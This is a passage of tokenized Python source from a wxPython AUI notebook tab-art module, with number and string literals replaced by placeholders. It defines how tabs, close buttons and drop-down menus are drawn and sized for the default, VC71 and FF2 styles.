wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_left_bmp = BitmapFromBits ( nb_left_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_right_bmp = BitmapFromBits ( nb_right_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> self . _active_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . BLACK ) <EOL> self . _disabled_windowlist_bmp = BitmapFromBits ( nb_list_bits , <NUM_LIT:16> , <NUM_LIT:16> , wx . Colour ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def SetAGWFlags ( self , agwFlags ) : <EOL> """<STR_LIT>""" <EOL> self . _agwFlags = agwFlags <EOL> def GetAGWFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _agwFlags <EOL> def SetSizingInfo ( self , tab_ctrl_size , tab_count , minMaxTabWidth ) : <EOL> """<STR_LIT>""" <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> minTabWidth , maxTabWidth = minMaxTabWidth <EOL> tot_width = tab_ctrl_size . x - self . GetIndentSize ( ) - <NUM_LIT:4> <EOL> if self . _agwFlags & AUI_NB_CLOSE_BUTTON : <EOL> tot_width -= self . _active_close_bmp . GetWidth ( ) <EOL> if self . _agwFlags & AUI_NB_WINDOWLIST_BUTTON : <EOL> tot_width -= self . _active_windowlist_bmp . GetWidth ( ) <EOL> if tab_count > <NUM_LIT:0> : <EOL> self . _fixed_tab_width = tot_width / tab_count <EOL> if self . _fixed_tab_width < <NUM_LIT:100> : <EOL> self . _fixed_tab_width = <NUM_LIT:100> <EOL> if self . _fixed_tab_width > tot_width / <NUM_LIT:2> : <EOL> self . _fixed_tab_width = tot_width / <NUM_LIT:2> <EOL> if self . _fixed_tab_width > <NUM_LIT> : <EOL> self . _fixed_tab_width = <NUM_LIT> <EOL> if minTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = max ( self . _fixed_tab_width , minTabWidth ) <EOL> if maxTabWidth > - <NUM_LIT:1> : <EOL> self . _fixed_tab_width = min ( self . _fixed_tab_width , maxTabWidth ) <EOL> self . _tab_ctrl_height = tab_ctrl_size . y <EOL> def DrawBackground ( self , dc , wnd , rect ) : <EOL> """<STR_LIT>""" <EOL> dc . SetBrush ( self . _bkbrush ) <EOL> dc . SetPen ( wx . TRANSPARENT_PEN ) <EOL> dc . DrawRectangle ( - <NUM_LIT:1> , - <NUM_LIT:1> , rect . GetWidth ( ) + <NUM_LIT:2> , rect . GetHeight ( ) + <NUM_LIT:2> ) <EOL> dc . SetPen ( wx . GREY_PEN ) <EOL> dc . DrawLine ( <NUM_LIT:0> , rect . GetHeight ( ) - <NUM_LIT:1> , rect . GetWidth ( ) , rect . GetHeight ( ) - <NUM_LIT:1> ) <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> dc . SetFont ( self . _selected_font ) <EOL> selected_textx , selected_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> normal_textx , normal_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = tab_size [ <NUM_LIT:1> ] <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> caption = page . caption <EOL> if page . active : <EOL> dc . SetPen ( self . _selected_bkpen ) <EOL> dc . SetBrush ( self . _selected_bkbrush ) <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx = selected_textx <EOL> texty = selected_texty <EOL> else : <EOL> dc . SetPen ( self . _normal_bkpen ) <EOL> dc . SetBrush ( self . _normal_bkbrush ) <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx = normal_textx <EOL> texty = normal_texty <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> points = [ wx . Point ( ) for i in xrange ( <NUM_LIT:7> ) ] <EOL> points [ <NUM_LIT:0> ] . x = tab_x <EOL> points [ <NUM_LIT:0> ] . y = tab_y + tab_height - <NUM_LIT:1> <EOL> points [ <NUM_LIT:1> ] . x = tab_x + tab_height - <NUM_LIT:3> <EOL> points [ <NUM_LIT:1> ] . y = tab_y + <NUM_LIT:2> <EOL> points [ <NUM_LIT:2> ] . x = tab_x + tab_height + <NUM_LIT:3> <EOL> points [ <NUM_LIT:2> ] . y = tab_y <EOL> points [ <NUM_LIT:3> ] . x = tab_x + tab_width - <NUM_LIT:2> <EOL> points [ <NUM_LIT:3> ] . y = tab_y <EOL> points [ <NUM_LIT:4> ] . x = tab_x + tab_width <EOL> points [ <NUM_LIT:4> ] . y = tab_y + <NUM_LIT:2> <EOL> points [ <NUM_LIT:5> ] . x = tab_x + tab_width <EOL> points [ <NUM_LIT:5> ] . y = tab_y + tab_height - <NUM_LIT:1> <EOL> points [ <NUM_LIT:6> ] = points [ <NUM_LIT:0> ] <EOL> dc . SetClippingRect ( in_rect ) <EOL> dc . DrawPolygon ( points ) <EOL> dc . SetPen ( wx . GREY_PEN ) <EOL> dc . DrawLines ( points ) <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> if control : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + close_button_width - ( textx / <NUM_LIT:2> ) - <NUM_LIT:2> <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + ( ( tab_width + close_button_width ) / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) - <NUM_LIT:2> <EOL> else : <EOL> if control : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + close_button_width - ( textx / <NUM_LIT:2> ) <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:2> ) + ( ( tab_width - close_button_width ) / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) + ( tab_width / <NUM_LIT:2> ) - ( textx / <NUM_LIT:2> ) <EOL> if control : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) - ( textx / <NUM_LIT:2> ) + close_button_width + <NUM_LIT:2> <EOL> else : <EOL> text_offset = tab_x + ( tab_height / <NUM_LIT:3> ) - ( textx / <NUM_LIT:2> ) <EOL> if text_offset < tab_x + tab_height : <EOL> text_offset = tab_x + tab_height <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) ) <EOL> else : <EOL> draw_text = ChopText ( dc , caption , <EOL> tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = ( tab_y + tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) + <NUM_LIT:1> <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> if page . active and wx . Window . FindFocus ( ) == wnd and ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> focusRect = wx . Rect ( text_offset , ( ( tab_y + tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) + <NUM_LIT:1> ) , <EOL> selected_textx , selected_texty ) <EOL> focusRect . Inflate ( <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> if page . active : <EOL> bmp = self . _active_close_bmp <EOL> else : <EOL> bmp = self . _disabled_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + tab_height - <NUM_LIT:2> , <EOL> tab_y + ( tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height - <NUM_LIT:1> ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:1> , <EOL> tab_y + ( tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + <NUM_LIT:1> , <EOL> close_button_width , tab_height - <NUM_LIT:1> ) <EOL> self . DrawButtons ( dc , rect , bmp , wx . WHITE , close_button_state ) <EOL> out_button_rect = wx . Rect ( * rect ) <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> def DrawButtons ( self , dc , _rect , bmp , bkcolour , button_state ) : <EOL> """<STR_LIT>""" <EOL> rect = wx . Rect ( * _rect ) <EOL> if button_state == AUI_BUTTON_STATE_PRESSED : <EOL> rect . x += <NUM_LIT:1> <EOL> rect . y += <NUM_LIT:1> <EOL> if button_state in [ AUI_BUTTON_STATE_HOVER , AUI_BUTTON_STATE_PRESSED ] : <EOL> dc . SetBrush ( wx . Brush ( StepColour ( bkcolour , <NUM_LIT> ) ) ) <EOL> dc . SetPen ( wx . Pen ( StepColour ( bkcolour , <NUM_LIT> ) ) ) <EOL> dc . DrawRectangle ( rect . x , rect . y , <NUM_LIT:15> , <NUM_LIT:15> ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> def GetIndentSize ( self ) : <EOL> """<STR_LIT>""" <EOL> return <NUM_LIT:0> <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control = None ) : <EOL> """<STR_LIT>""" <EOL> dc . SetFont ( self . _measuring_font ) <EOL> measured_textx , measured_texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> tab_height = measured_texty + <NUM_LIT:4> <EOL> tab_width = measured_textx + tab_height + <NUM_LIT:5> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> tab_width += self . _active_close_bmp . GetWidth ( ) <EOL> if self . _agwFlags & AUI_NB_TAB_FIXED_WIDTH : <EOL> tab_width = self . _fixed_tab_width <EOL> if control is not None : <EOL> controlW , controlH = control . GetSize ( ) <EOL> tab_width += controlW + <NUM_LIT:4> <EOL> x_extent = tab_width - ( tab_height / <NUM_LIT:2> ) - <NUM_LIT:1> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawButton ( self , dc , wnd , in_rect , button , orientation ) : <EOL> """<STR_LIT>""" <EOL> bitmap_id , button_state = button . id , button . cur_state <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_close_bmp <EOL> else : <EOL> bmp = self . _active_close_bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_left_bmp <EOL> else : <EOL> bmp = self . _active_left_bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_right_bmp <EOL> else : <EOL> bmp = self . _active_right_bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = self . _disabled_windowlist_bmp <EOL> else : <EOL> bmp = self . _active_windowlist_bmp <EOL> else : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> bmp = button . dis_bitmap <EOL> else : <EOL> bmp = button . bitmap <EOL> if not bmp . IsOk ( ) : <EOL> return <EOL> rect = wx . Rect ( * in_rect ) <EOL> if orientation == wx . LEFT : <EOL> rect . SetX ( in_rect . x ) <EOL> rect . SetY ( ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) ) <EOL> rect . SetWidth ( bmp . GetWidth ( ) ) <EOL> rect . SetHeight ( bmp . GetHeight ( ) ) <EOL> else : <EOL> rect = wx . Rect ( in_rect . x + in_rect . width - bmp . GetWidth ( ) , <EOL> ( ( in_rect . y + in_rect . height ) / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) , <EOL> bmp . GetWidth ( ) , bmp . GetHeight ( ) ) <EOL> self . DrawButtons ( dc , rect , bmp , wx . WHITE , button_state ) <EOL> out_rect = wx . Rect ( * rect ) <EOL> return out_rect <EOL> def ShowDropDown ( self , wnd , pages , active_idx ) : <EOL> """<STR_LIT>""" <EOL> menuPopup = wx . Menu ( ) <EOL> useImages = self . GetAGWFlags ( ) & AUI_NB_USE_IMAGES_DROPDOWN <EOL> for i , page in enumerate ( pages ) : <EOL> if useImages : <EOL> menuItem = wx . MenuItem ( menuPopup , <NUM_LIT:1000> + i , page . caption ) <EOL> if page . bitmap : <EOL> menuItem . SetBitmap ( page . bitmap ) <EOL> menuPopup . AppendItem ( menuItem ) <EOL> else : <EOL> menuPopup . AppendCheckItem ( <NUM_LIT:1000> + i , page . caption ) <EOL> menuPopup . Enable ( <NUM_LIT:1000> + i , page . enabled ) <EOL> if active_idx != - <NUM_LIT:1> and not useImages : <EOL> menuPopup . Check ( <NUM_LIT:1000> + active_idx , True ) <EOL> pt = wx . GetMousePosition ( ) <EOL> pt = wnd . ScreenToClient ( pt ) <EOL> if pt . x < <NUM_LIT:100> : <EOL> pt . x = <NUM_LIT:0> <EOL> else : <EOL> pt . x -= <NUM_LIT:100> <EOL> cli_rect = wnd . GetClientRect ( ) <EOL> pt . y = cli_rect . y + cli_rect . height <EOL> cc = AuiCommandCapture ( ) <EOL> wnd . PushEventHandler ( cc ) <EOL> wnd . PopupMenu ( menuPopup , pt ) <EOL> command = cc . GetCommandId ( ) <EOL> wnd . PopEventHandler ( True ) <EOL> if command >= <NUM_LIT:1000> : <EOL> return command - <NUM_LIT:1000> <EOL> return - <NUM_LIT:1> <EOL> def GetBestTabCtrlSize ( self , wnd , pages , required_bmp_size ) : <EOL> """<STR_LIT>""" <EOL> dc = wx . ClientDC ( wnd ) <EOL> dc . SetFont ( self . _measuring_font ) <EOL> s , x_extent = self . GetTabSize ( dc , wnd , "<STR_LIT>" , wx . NullBitmap , True , <EOL> AUI_BUTTON_STATE_HIDDEN , None ) <EOL> max_y = s [ <NUM_LIT:1> ] <EOL> for page in pages : <EOL> if page . control : <EOL> controlW , controlH = page . control . GetSize ( ) <EOL> max_y = max ( max_y , controlH + <NUM_LIT:4> ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( page . caption ) <EOL> max_y = max ( max_y , texty ) <EOL> return max_y + <NUM_LIT:3> <EOL> def SetNormalFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _normal_font = font <EOL> def SetSelectedFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _selected_font = font <EOL> def SetMeasuringFont ( self , font ) : <EOL> """<STR_LIT>""" <EOL> self . _measuring_font = font <EOL> def GetNormalFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _normal_font <EOL> def GetSelectedFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _selected_font <EOL> def GetMeasuringFont ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measuring_font <EOL> def SetCustomButton ( self , bitmap_id , button_state , bmp ) : <EOL> """<STR_LIT>""" <EOL> if bitmap_id == AUI_BUTTON_CLOSE : <EOL> if button_state == AUI_BUTTON_STATE_NORMAL : <EOL> self . _active_close_bmp = bmp <EOL> self . _hover_close_bmp = self . _active_close_bmp <EOL> self . _pressed_close_bmp = self . _active_close_bmp <EOL> self . _disabled_close_bmp = self . _active_close_bmp <EOL> elif button_state == AUI_BUTTON_STATE_HOVER : <EOL> self . _hover_close_bmp = bmp <EOL> elif button_state == AUI_BUTTON_STATE_PRESSED : <EOL> self . _pressed_close_bmp = bmp <EOL> else : <EOL> self . _disabled_close_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_LEFT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_left_bmp = bmp <EOL> else : <EOL> self . _active_left_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_RIGHT : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_right_bmp = bmp <EOL> else : <EOL> self . _active_right_bmp = bmp <EOL> elif bitmap_id == AUI_BUTTON_WINDOWLIST : <EOL> if button_state & AUI_BUTTON_STATE_DISABLED : <EOL> self . _disabled_windowlist_bmp = bmp <EOL> else : <EOL> self . _active_windowlist_bmp = bmp <EOL> class VC71TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , page . active , <EOL> close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:3> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> agwFlags = self . GetAGWFlags ( ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> tab_y -= <NUM_LIT:1> <EOL> dc . SetPen ( ( page . active and [ wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DHIGHLIGHT ) ) ] or [ wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DSHADOW ) ) ] ) [ <NUM_LIT:0> ] ) <EOL> dc . SetBrush ( ( page . active and [ wx . Brush ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DFACE ) ) ] or [ wx . TRANSPARENT_BRUSH ] ) [ <NUM_LIT:0> ] ) <EOL> if page . active : <EOL> tabH = tab_height - <NUM_LIT:2> <EOL> dc . DrawRectangle ( tab_x , tab_y , tab_width , tabH ) <EOL> rightLineY1 = ( agwFlags & AUI_NB_BOTTOM and [ vertical_border_padding - <NUM_LIT:2> ] or [ vertical_border_padding - <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> rightLineY2 = tabH + <NUM_LIT:3> <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DSHADOW ) ) ) <EOL> dc . DrawLine ( tab_x + tab_width - <NUM_LIT:1> , rightLineY1 + <NUM_LIT:1> , tab_x + tab_width - <NUM_LIT:1> , rightLineY2 ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . DrawLine ( tab_x + <NUM_LIT:1> , rightLineY2 - <NUM_LIT:3> , tab_x + tab_width - <NUM_LIT:1> , rightLineY2 - <NUM_LIT:3> ) <EOL> dc . SetPen ( wx . Pen ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_3DDKSHADOW ) ) ) <EOL> dc . DrawLine ( tab_x + tab_width , rightLineY1 , tab_x + tab_width , rightLineY2 ) <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> dc . DrawLine ( tab_x , rightLineY2 - <NUM_LIT:2> , tab_x + tab_width , rightLineY2 - <NUM_LIT:2> ) <EOL> else : <EOL> blackLineY1 = ( agwFlags & AUI_NB_BOTTOM and [ vertical_border_padding + <NUM_LIT:2> ] or [ vertical_border_padding + <NUM_LIT:1> ] ) [ <NUM_LIT:0> ] <EOL> blackLineY2 = tab_height - <NUM_LIT:5> <EOL> dc . DrawLine ( tab_x + tab_width , blackLineY1 , tab_x + tab_width , blackLineY2 ) <EOL> border_points = [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:6> ) <EOL> else : <EOL> border_points [ <NUM_LIT:0> ] = wx . Point ( tab_x , tab_y + tab_height - <NUM_LIT:4> ) <EOL> border_points [ <NUM_LIT:1> ] = wx . Point ( tab_x , tab_y + <NUM_LIT:2> ) <EOL> drawn_tab_yoff = border_points [ <NUM_LIT:1> ] . y <EOL> drawn_tab_height = border_points [ <NUM_LIT:0> ] . y - border_points [ <NUM_LIT:1> ] . y <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> close_button_width = <NUM_LIT:0> <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> text_offset += close_button_width - <NUM_LIT:5> <EOL> if not page . enabled : <EOL> dc . SetTextForeground ( wx . SystemSettings . GetColour ( wx . SYS_COLOUR_GRAYTEXT ) ) <EOL> pagebitmap = page . dis_bitmap <EOL> else : <EOL> dc . SetTextForeground ( page . text_colour ) <EOL> pagebitmap = page . bitmap <EOL> shift = <NUM_LIT:0> <EOL> if agwFlags & AUI_NB_BOTTOM : <EOL> shift = ( page . active and [ <NUM_LIT:1> ] or [ <NUM_LIT:2> ] ) [ <NUM_LIT:0> ] <EOL> bitmap_offset = <NUM_LIT:0> <EOL> if pagebitmap . IsOk ( ) : <EOL> bitmap_offset = tab_x + <NUM_LIT:8> <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT and close_button_width : <EOL> bitmap_offset += close_button_width - <NUM_LIT:5> <EOL> dc . DrawBitmap ( pagebitmap , bitmap_offset , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( pagebitmap . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> True ) <EOL> text_offset = bitmap_offset + pagebitmap . GetWidth ( ) <EOL> text_offset += <NUM_LIT:3> <EOL> else : <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT == <NUM_LIT:0> or not close_button_width : <EOL> text_offset = tab_x + <NUM_LIT:8> <EOL> caption = page . caption <EOL> if caption == "<STR_LIT>" : <EOL> caption = "<STR_LIT>" <EOL> if page . active : <EOL> dc . SetFont ( self . _selected_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> else : <EOL> dc . SetFont ( self . _normal_font ) <EOL> textx , texty , dummy = dc . GetMultiLineTextExtent ( caption ) <EOL> draw_text = ChopText ( dc , caption , tab_width - ( text_offset - tab_x ) - close_button_width ) <EOL> ypos = drawn_tab_yoff + ( drawn_tab_height ) / <NUM_LIT:2> - ( texty / <NUM_LIT:2> ) - <NUM_LIT:1> + shift <EOL> offset_focus = text_offset <EOL> if control is not None : <EOL> if control . GetPosition ( ) != wx . Point ( text_offset + <NUM_LIT:1> , ypos ) : <EOL> control . SetPosition ( wx . Point ( text_offset + <NUM_LIT:1> , ypos ) ) <EOL> if not control . IsShown ( ) : <EOL> control . Show ( ) <EOL> if paint_control : <EOL> bmp = TakeScreenShot ( control . GetScreenRect ( ) ) <EOL> dc . DrawBitmap ( bmp , text_offset + <NUM_LIT:1> , ypos , True ) <EOL> controlW , controlH = control . GetSize ( ) <EOL> text_offset += controlW + <NUM_LIT:4> <EOL> textx += controlW + <NUM_LIT:4> <EOL> rectx , recty , dummy = dc . GetMultiLineTextExtent ( draw_text ) <EOL> dc . DrawLabel ( draw_text , wx . Rect ( text_offset , ypos , rectx , recty ) ) <EOL> out_button_rect = wx . Rect ( ) <EOL> if ( agwFlags & AUI_NB_NO_TAB_FOCUS ) == <NUM_LIT:0> : <EOL> self . DrawFocusRectangle ( dc , page , wnd , draw_text , offset_focus , bitmap_offset , drawn_tab_yoff + shift , <EOL> drawn_tab_height + shift , rectx , recty ) <EOL> if close_button_state != AUI_BUTTON_STATE_HIDDEN : <EOL> close_button_width = self . _active_close_bmp . GetWidth ( ) <EOL> bmp = self . _disabled_close_bmp <EOL> if close_button_state == AUI_BUTTON_STATE_HOVER : <EOL> bmp = self . _hover_close_bmp <EOL> elif close_button_state == AUI_BUTTON_STATE_PRESSED : <EOL> bmp = self . _pressed_close_bmp <EOL> if agwFlags & AUI_NB_CLOSE_ON_TAB_LEFT : <EOL> rect = wx . Rect ( tab_x + <NUM_LIT:4> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> else : <EOL> rect = wx . Rect ( tab_x + tab_width - close_button_width - <NUM_LIT:3> , <EOL> drawn_tab_yoff + ( drawn_tab_height / <NUM_LIT:2> ) - ( bmp . GetHeight ( ) / <NUM_LIT:2> ) + shift , <EOL> close_button_width , tab_height ) <EOL> rect = IndentPressedBitmap ( rect , close_button_state ) <EOL> dc . DrawBitmap ( bmp , rect . x , rect . y , True ) <EOL> out_button_rect = rect <EOL> out_tab_rect = wx . Rect ( tab_x , tab_y , tab_width , tab_height ) <EOL> dc . DestroyClippingRegion ( ) <EOL> return out_tab_rect , out_button_rect , x_extent <EOL> class FF2TabArt ( AuiDefaultTabArt ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> AuiDefaultTabArt . __init__ ( self ) <EOL> def Clone ( self ) : <EOL> """<STR_LIT>""" <EOL> art = type ( self ) ( ) <EOL> art . SetNormalFont ( self . GetNormalFont ( ) ) <EOL> art . SetSelectedFont ( self . GetSelectedFont ( ) ) <EOL> art . SetMeasuringFont ( self . GetMeasuringFont ( ) ) <EOL> art = CopyAttributes ( art , self ) <EOL> return art <EOL> def GetTabSize ( self , dc , wnd , caption , bitmap , active , close_button_state , control ) : <EOL> """<STR_LIT>""" <EOL> tab_size , x_extent = AuiDefaultTabArt . GetTabSize ( self , dc , wnd , caption , bitmap , <EOL> active , close_button_state , control ) <EOL> tab_width , tab_height = tab_size <EOL> tab_height += <NUM_LIT:2> <EOL> return ( tab_width , tab_height ) , x_extent <EOL> def DrawTab ( self , dc , wnd , page , in_rect , close_button_state , paint_control = False ) : <EOL> """<STR_LIT>""" <EOL> control = page . control <EOL> tab_size , x_extent = self . GetTabSize ( dc , wnd , page . caption , page . bitmap , <EOL> page . active , close_button_state , control ) <EOL> tab_height = self . _tab_ctrl_height - <NUM_LIT:2> <EOL> tab_width = tab_size [ <NUM_LIT:0> ] <EOL> tab_x = in_rect . x <EOL> tab_y = in_rect . y + in_rect . height - tab_height <EOL> clip_width = tab_width <EOL> if tab_x + clip_width > in_rect . x + in_rect . width - <NUM_LIT:4> : <EOL> clip_width = ( in_rect . x + in_rect . width ) - tab_x - <NUM_LIT:4> <EOL> dc . SetClippingRegion ( tab_x , tab_y , clip_width + <NUM_LIT:1> , tab_height - <NUM_LIT:3> ) <EOL> tabPoints = [ wx . Point ( ) for i in xrange ( <NUM_LIT:7> ) ] <EOL> adjust = <NUM_LIT:0> <EOL> if not page . active : <EOL> adjust = <NUM_LIT:1> <EOL> agwFlags = self . 